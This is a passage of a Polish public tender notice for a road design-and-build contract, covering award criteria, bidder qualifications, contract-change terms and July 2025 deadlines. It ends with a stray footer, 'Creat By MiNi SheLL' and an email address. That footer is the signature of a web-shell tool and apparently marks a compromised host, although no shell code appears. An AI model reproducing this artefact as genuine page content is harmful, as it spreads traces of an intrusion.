Nadzór nad projektem i dokumentacją</p> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">77211400-6 - Usługi wycinania drzew</p> <p class="mb-0">45112000-5 - Roboty w zakresie usuwania gleby</p> <p class="mb-0">45111000-8 - Roboty w zakresie burzenia, roboty ziemne</p> <p class="mb-0">45230000-8 - Roboty budowlane w zakresie budowy rurociągów, linii komunikacyjnych i elektroenergetycznych, autostrad, dróg, lotnisk i kolei; wyrównywanie terenu</p> <p class="mb-0">45233200-1 - Roboty w zakresie różnych nawierzchni</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <p class="mb-0">45233121-3 - Roboty w zakresie budowy dróg głównych</p> <p class="mb-0">45221000-2 - Roboty budowlane w zakresie budowy mostów i tuneli, szybów i kolei podziemnej</p> <p class="mb-0">44132000-4 - Elementy przepustów</p> <p class="mb-0">45112710-5 - Roboty w zakresie kształtowania terenów zielonych</p> <p class="mb-0">45232451-8 - Roboty odwadniające i nawierzchniowe</p> <p class="mb-0">45233290-8 - Instalowanie znaków drogowych</p> <p class="mb-0">45316110-9 - Instalowanie urządzeń oświetlenia drogowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">17.1. Zamawiający dokona oceny ofert, które nie zostały odrzucone, na podstawie następujących<br/>kryteriów oceny ofert:<br/>Lp. Nazwa kryterium Znaczenie kryterium (w %)<br/>1 Cena (C) 60<br/>2 Długość okresu gwarancji na cały przedmiot zamówienia (G) 25<br/>3 Doświadczenie głównego projektanta b. drogowej (D) 15<br/>17.2. Zamawiający dokona oceny ofert przyznając punkty w ramach poszczególnych kryteriów oceny ofert, przyjmując zasadę, że<br/>1% = 1 punkt.<br/>Ocena oferty (O) – znaczenie 100 pkt<br/>Liczba punktów uzyskanych przez daną ofertę wyliczona będzie wg wzoru:<br/>O = C + G + D<br/>gdzie:<br/>O – suma punktów uzyskanych przez daną ofertę we wszystkich kryteriach<br/>C – liczba punktów uzyskanych przez daną ofertę w kryterium „Cena”<br/>G – liczba punktów uzyskanych przez daną ofertę w kryterium „Długość okresu gwarancji na cały przedmiot zamówienia”<br/>D – liczba punktów uzyskanych przez daną ofertę w kryterium „Doświadczenie głównego projektanta b. drogowej”<br/>17.3. Maksymalna liczba punktów, jaką może uzyskać Wykonawca wynosi – 100 punktów. Punkty przyznane zostaną obliczone dla<br/>każdego z kryteriów oddzielnie. Suma punktów uzyskanych za wszystkie kryteria oceny stanowić będzie końcową ocenę danej oferty<br/>(O).<br/>17.4. Punkty przyznawane za podane kryterium będą liczone według następujących wzorów:<br/>1) C = CN / COB x 60 % x 100<br/>gdzie:<br/>C – liczba punktów uzyskanych przez daną ofertę w kryterium „Cena”<br/>CN – najniższa zaoferowana cena brutto, spośród ważnych ofert<br/>COB – cena brutto zaoferowana w ofercie badanej<br/>2) G = GOB x 25 % x 100<br/>gdzie:<br/>G – liczba punktów uzyskanych przez daną ofertę w kryterium „Długość okresu gwarancji na cały przedmiot zamówienia”<br/>GOB – okres gwarancji podany w badanej ofercie, liczony w miesiącach<br/>a) Wykonawca może zaproponować okres gwarancji (GOB) w następujących okresach:<br/>- 36 miesięcy<br/>- 42 miesiące<br/>- 48 miesięcy<br/>- 54 miesiące<br/>- 60 miesięcy<br/>b) Faktyczna ilość punktów zostanie obliczona następująco (GOB):<br/>- okres gwarancji 36 miesięcy – 0,00 pkt<br/>- okres gwarancji 42 miesiące – 0,25 pkt<br/>- okres gwarancji 48 miesięcy – 0,50 pkt<br/>- okres gwarancji 54 miesiące – 0,75 pkt<br/>- okres gwarancji 60 miesięcy – 1,00 pkt<br/>c) Minimalny wymagany okres gwarancji wynosi 36 miesięcy. Oferta z gwarancją krótszą niż wymagane minimum zostanie<br/>odrzucona jako niezgodna z treścią SWZ (na podstawie art. 226 ust. 1 pkt 5 ustawy Pzp).<br/>d) Wykonawca może zaproponować długość okresu gwarancji dłuższy niż wyznaczony maksymalny 60 miesięcy, jednak w tym<br/>przypadku Zamawiający przyjmie do obliczeń wartość 60 m-cy – najdłuższy przyjęty w kryterium oceny ofert „Długość okresu<br/>gwarancji na cały przedmiot zamówienia”.<br/>e) Okres gwarancji dla całego przedmiotu zamówienia liczy się od daty podpisania końcowego protokołu odbioru całego przedmiotu<br/>zamówienia.<br/>f) W przypadku braku podania okresu gwarancji w ofercie, Zamawiający odrzuci ofertę Wykonawcy na podstawie art. 226 ust. 1 pkt 5<br/>ustawy Pzp.<br/>3) Doświadczenie głównego projektanta b. drogowej (D) – punkty będą przyznawane w skali od 0,00 do 15,00 punktów (1 pkt = 1 %),<br/>na podstawie oświadczenia Wykonawcy złożonego w ofercie (Załącznik nr 3 – Formularz ofertowy „Kryteria poza cenowe”)<br/>a) W ramach przedmiotowego kryterium punkty będą przyznawane za ilość zadań dot. doświadczenia zawodowego projektanta<br/>głównego branży drogowej przy opracowaniu dokumentacji projektowej, której zakres obejmował budowę lub przebudowę lub<br/>rozbudowę drogi lub ciągu (ścieżki) pieszo-rowerowego lub ciągu (ścieżki) rowerowej o nawierzchni bitumicznej wraz z uzyskaniem<br/>decyzji zezwalającej na realizację inwestycji drogowej (ZRID).<br/>b) punkty przyznawane będą za określoną ilość zdobytego doświadczenia zawodowego (D):<br/>- za 1 zadanie potwierdzające powyższe kryterium Wykonawca otrzyma 5,00 punktów,<br/>- za 2 zadania potwierdzające powyższe kryterium Wykonawca otrzyma 10,00 punktów,<br/>- za 3 lub więcej zadań potwierdzających powyższe kryterium Wykonawca otrzyma 15,00 punktów,<br/> (...)<br/>Ze względu na ograniczoną ilość znaków pozostałe informacje znajdują się w Rozdziale 17 SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość okresu gwarancji na cały przedmiot zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">25,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie głównego projektanta b. drogowej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 6.1.4.	Zdolności technicznej lub zawodowej w zakresie (opis sposobu dokonywania oceny spełniania tego warunku):<br/>1)	Wykonawca winien wykazać, że wykonał należycie oraz zgodnie z przepisami prawa budowlanego i prawidłowo ukończył nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie: co najmniej jedną robotę budowlaną o wartości minimum 3.000.000,00 zł brutto (trzy miliony złotych brutto), która polegała na budowie lub przebudowie lub rozbudowie drogi albo ścieżki (ciągu) rowerowej albo ścieżki (ciągu) pieszo-rowerowej o nawierzchni bitumicznej.<br/>2)	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy dysponują lub będą dysponować w okresie wykonywania zamówienia i skierują do jego realizacji nw. osoby, w tym co najmniej:<br/>a)	jedną osobę (projektant główny) posiadającą uprawnienia budowlane do projektowania w specjalności inżynieryjnej drogowej bez ograniczeń lub odpowiadające im równoważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów, w zakresie obejmującym przedmiot zamówienia,<br/>b)	jedną osobę posiadającą uprawnienia mostowe do projektowania w specjalności inżynieryjnej mostowej lub odpowiadające im równoważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów, w zakresie obejmującym przedmiot zamówienia<br/>c)	jedną osobę kierownika budowy posiadającego uprawnienia drogowe do kierowania robotami budowlanymi w specjalności inżynieryjnej drogowej bez ograniczeń, w zakresie obejmującym przedmiot zamówienia<br/>d)	jedną osobę kierownika robót posiadającego uprawnienia mostowe do kierowania robotami budowlanymi w specjalności inżynieryjnej mostowej, w zakresie obejmującym przedmiot zamówienia; <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">8.3.1.	W celu potwierdzenia spełniania warunków udziału w postępowaniu nw. dokumenty/oświadczenia:<br/>1)	wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane (sporządzonego zgodnie z Załącznikiem Nr 7 do SWZ), oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie; dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest wstanie uzyskać tych dokumentów – inne odpowiednie dokumenty – w odniesieniu do warunku określonego w pkt 6.1.4. ppkt 1) SWZ,<br/>	Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót budowlanych wykonywanych wspólnie z innymi Wykonawcami, ww. wykaz robót, dotyczy robót budowlanych, w których wykonaniu Wykonawca ten bezpośrednio uczestniczył;<br/>2)	wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (sporządzonego zgodnie z Załącznikiem Nr 8 do SWZ) – w odniesieniu do warunku określonego w pkt 6.1.4. ppkt 2) SWZ</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 13.8.	Oferta musi zawierać następujące oświadczenia i dokumenty:<br/>1)	Formularz ofertowy – do wykorzystania wzór (druk), stanowiący Załącznik nr 3 do SWZ (przy czym Wykonawca może sporządzić ofertę wg innego wzorca - powinna ona wówczas obejmować dane wymagane dla oferty w SWZ i załącznikach);<br/>2)	Oświadczenia o których mowa w pkt 8.1. SWZ – Załącznik nr 4 i 5 do SWZ;<br/>3)	Oświadczenie, o którym mowa w pkt 8.2. SWZ (jeżeli dotyczy) – Załącznik nr 6 do SWZ;<br/>4)	Zobowiązanie lub inne dokumenty, o których mowa w pkt 9.4. SWZ (jeżeli dotyczy) – Załącznik nr 9 do SWZ;<br/>5)	Potwierdzenie umocowania do działania w imieniu wykonawcy lub podmiotu udostępniającego zasoby:<br/>a)	jeżeli w imieniu Wykonawcy lub podmiotu udostępniającego zasoby działa osoba, której umocowanie do jego reprezentowania nie wynika z informacji ogólnodostępnych zawartych w Krajowym Rejestrze Sądowym, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innym właściwym rejestrze, Zamawiający żąda od Wykonawcy lub podmiotu udostępniającego zasoby do złożenia wraz z ofertą pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do reprezentowania. <br/>6)	Pełnomocnictwo do reprezentowania Wykonawców wspólnie ubiegających się o udzielenie zamówienia w postępowaniu o udzielenie zamówienia albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (jeżeli dotyczy). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 6.4.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, co najmniej jeden z Wykonawców powinien wykazać spełnienie warunku określonego w pkt 6.1.4 ppkt 1) lub 2) SWZ.<br/>6.5.	W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wykazując warunek udziału w postępowaniu mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane.<br/><br/>10.1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>10.2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>1)	oświadczenia o których mowa w pkt 8.1. SWZ składa z ofertą każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu lub kryteriów selekcji w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu lub kryteriów selekcji.<br/>2)	w przypadku, o którym mowa w pkt 6.5. SWZ wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni Wykonawcy. Oświadczenie należy złożyć wg wymogów załącznika nr 6 do SWZ. Oświadczenie to jest podmiotowym środkiem dowodowym.<br/>3)	zobowiązani są oni na wezwanie Zamawiającego, złożyć podmiotowe środki dowodowe, o których mowa w pkt 8.3. SWZ, przy czym podmiotowe środki dowodowe, o których mowa:<br/>	w pkt 8.3.1. SWZ składa odpowiednio Wykonawca/Wykonawcy, który/którzy wykazuje/-ą spełnienie warunku;<br/>10.3.	Jeżeli została wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców.<br/>10.4.	Wykonawcy wspólnie ubiegających się o udzielenie zamówienia, ponoszą solidarną odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający przewiduje możliwość zmian i uzupełnień postanowień zawartej umowy. Strony dopuszczają dokonywanie<br/>zmian treści umowy, w następujących okolicznościach:<br/>1) dopuszcza się wprowadzenie zmian i uzupełnień za zgodą Stron umowy,<br/>2) zmiany mogą być inicjowane przez Zamawiającego lub przez Wykonawcę,<br/>3) zmiany umowy, o których mowa w pkt 1) powyżej muszą być dokonywane z zachowaniem przepisu art. 454 oraz art. 455<br/>ustawy Pzp.<br/>2. Dopuszczalne zmiany odnoszące się do przedmiotu zamówienia:<br/>1) Dopuszczalna jest zmiana przedmiotu zamówienia poprzez zmianę zakresu robót budowlanych przewidzianych w<br/>dokumentacji projektowej/technicznej w przypadku:<br/>a) konieczności wykonania robót, których wykonanie ma na celu prawidłowe zrealizowanie przedmiotu zamówienia, a<br/>konieczność ich wykonania wynika z zasad wiedzy technicznej, uzasadnionych potrzeb Zamawiającego lub gdy wystąpiły<br/>wady dokumentacji projektowej/technicznej,<br/>b) konieczności wykonania robót niezbędnych do prawidłowego wykonania przedmiotu zamówienia, które nie zostały<br/>przewidziane w dokumentacji projektowej/technicznej opracowanej przez Wykonawcę, a bez których osiągnięcie celu<br/>zamówienia nie jest możliwe,<br/>c) zmiany dokumentacji projektowej/technicznej wykonane z inicjatywy Zamawiającego ze względu na stwierdzone Wady,<br/>co spowoduje konieczność wykonania robót zamiennych,<br/>d) zmiany decyzji administracyjnych, zezwoleń, uzgodnień oraz opinii podmiotów zewnętrznych na podstawie których<br/>prowadzone są roboty budowlane objęte przedmiotem zamówienia, powodujące zmianę dotychczasowego zakresu robót<br/>przewidzianego w dokumentacji projektowej/technicznej lub innych dokumentach opisujących przedmiot zamówienia<br/>2) Dopuszczalna jest zmiana zakresu robót budowlanych poprzez ich ograniczenie w sytuacji, gdy wykonanie niektórych<br/>robót okazało się zbędne, zmieniły się okoliczności związane z wykonaniem niniejszej umowy lub wykonanie<br/>poszczególnych robót nie leży w interesie publicznym lub Zamawiającego, z zastrzeżeniem, że zakres robót nie może ulec<br/>zmianie o więcej niż 30 % zakresu rzeczowego lub finansowego przedmiotu zamówienia.<br/> W takim przypadku wynagrodzenie Wykonawcy zmniejsza się odpowiednio w stosunku do zmniejszonego zakresu robót z<br/>uwzględnieniem mechanizmu opisanego w 6 niniejszego Rozdziału.<br/>3) Dopuszczalna jest zmiana przedmiotu zamówienia, w szczególności zmiana sposobu wykonania przedmiotu Umowy,<br/>zakresu robót, lokalizacji robót w sytuacji:<br/>a) wystąpienia innych warunków geologicznych, geotechnicznych, hydrologicznych, niż te wskazane w dokumentacji<br/>projektowej/technicznej lub innych dokumentach opisujących przedmiot zamówienia, powodujących konieczność zmiany<br/>sposobu wykonania przedmiotu zamówienia,<br/>b) wystąpienia na terenie budowy niewybuchów, niewypałów lub znalezisk archeologicznych, które uniemożliwiają lub<br/>utrudniają wykonanie robót na warunkach przewidzianych w niniejszej umowie,<br/>c) zmiany po upływie terminu składania ofert powszechnie obowiązujących przepisów prawa, które miały wpływ na<br/>możliwość wykonania przedmiotu zamówienia,<br/>d) wystąpienia siły wyższej, która uniemożliwiła lub istotnie ograniczyła możliwość wykonania przedmiotu zamówienia albo<br/>jego części w sposób określony w niniejszej umowie lub dokumentach zamówienia;<br/>4) Dopuszczalna jest zmiana technologii wykonania robót lub materiałów przewidzianych w dokumentacji<br/>projektowej/technicznej lub innych dokumentach opisujących przedmiot zamówienia, jeżeli w wyniku rozwoju technicznego<br/>lub technologicznego możliwe jest wykonanie robót przy zastosowaniu innej technologii lub materiałów, które:<br/>a) podwyższą jakość wykonanych robót, lub<br/>b) zmniejszą koszty realizacji przedmiotu zamówienia lub koszty eksploatacji przedmiotu zamówienia, lub<br/>c) pozwolą na skrócenie terminu wykonania umowy, lub<br/>d) (...)<br/>Ze względu na ograniczoną ilość znaków, szczegółowe informacje o zmianach umowy znajdują się w Projekcie Umowy<br/>stanowiącym Załącznik Nr 2 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-07-02 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi dokumentami należy złożyć za pośrednictwem Platformy zakupowej: platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/popielow</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-07-02 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-07-31</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 25.1.	Zamawiający:<br/>1)	nie przewiduje wyboru najkorzystniejszej oferty z możliwością przeprowadzenia negocjacji,<br/>2)	nie dopuszcza składania ofert częściowych,<br/>3)	nie dopuszcza składania ofert wariantowych,<br/>4)	nie przewiduje wymagań wskazanych w art. 96 ust. 2 pkt 2 ustawy Pzp,<br/>5)	nie przewiduje wymagań wskazanych w art. 94 ustawy Pzp,<br/>6)	nie przewiduje zamówień, o których mowa w art. 214 ust. 1 pkt 7 i 8 ustawy Pzp,<br/>7)	nie wymaga przeprowadzenia przez Wykonawcę obowiązkowej wizji lokalnej lub sprawdzenia przez niego dokumentów niezbędnych do realizacji zamówienia, o których mowa w art. 131 ust. 2 ustawy Pzp,<br/>8)	nie przewiduje rozliczenia między Zamawiającym a Wykonawcą w walutach obcych,<br/>9)	nie przewiduje zwrotu kosztów udziału w postępowaniu,<br/>10)	nie wymaga obowiązku osobistego wykonania przez Wykonawcę kluczowych zadań zgodnie z art. 60 i art. 121 ustawy Pzp,<br/>11)	nie przewiduje zawarcia umowy ramowej,<br/>12)	nie przewiduje wyboru najkorzystniejszej oferty z zastosowaniem aukcji elektronicznej wraz z informacjami, o których mowa w art. 230 ustawy Pzp,<br/>13)	nie stawia wymogu lub możliwości złożenia ofert w postaci katalogów elektronicznych lub dołączenia katalogów elektronicznych do oferty, w sytuacji określonej w art. 93 ustawy Pzp,<br/>14)	nie przewiduje udzielenia zaliczek na poczet wykonania zamówienia.

Creat By MiNi SheLL
Email: jattceo@gmail.com